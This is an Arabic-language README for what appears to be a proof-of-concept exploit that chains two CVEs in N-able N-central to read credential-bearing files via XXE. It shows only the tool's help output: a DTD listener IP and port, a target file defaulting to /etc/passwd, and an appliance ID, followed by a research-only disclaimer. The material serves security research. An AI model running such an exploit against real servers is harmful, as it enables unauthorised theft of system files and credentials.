
إثبات مفهوم استغلال لـ N-able N-central لربط CVE-2025-9316 و CVE-2025-11700 لقراءة الملفات
إثبات المفهوم لاستغلال N-able N-central لربط CVE-2025-9316 و CVE-2025-11700 لقراءة ملفات تحتوي على بيانات اعتماد
تحليل متعمق هنا: https://www.horizon3.ai/attack-research/attack-blogs/n-able-n-central-from-n-days-to-0-days/
% python3 ncentral_xxe_file_read.py -h
usage: ncentral_xxe_file_read.py [-h] --url URL --listen-ip LISTEN_IP --listen-port LISTEN_PORT [--file FILE] [--appliance-id APPLIANCE_ID] [--test-only]
N-able N-Central XXE Vulnerability Exploit
options:
-h, --help عرض رسالة المساعدة هذه والخروج
--url URL رابط N-Central الأساسي
--listen-ip LISTEN_IP
عنوان IP لربط خادم DTD به
--listen-port LISTEN_PORT
المنفذ لربط خادم DTD به
--file FILE الملف المستهدف لقراءته (الافتراضي: /etc/passwd)
--appliance-id APPLIANCE_ID
معرف الجهاز المستخدم (الافتراضي: 3)
--test-only اختبار إمكانية الوصول إلى نقطة النهاية فقط
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي بحتة ولتطوير تقنيات دفاعية فعالة، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في الحالات المصرح بها صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.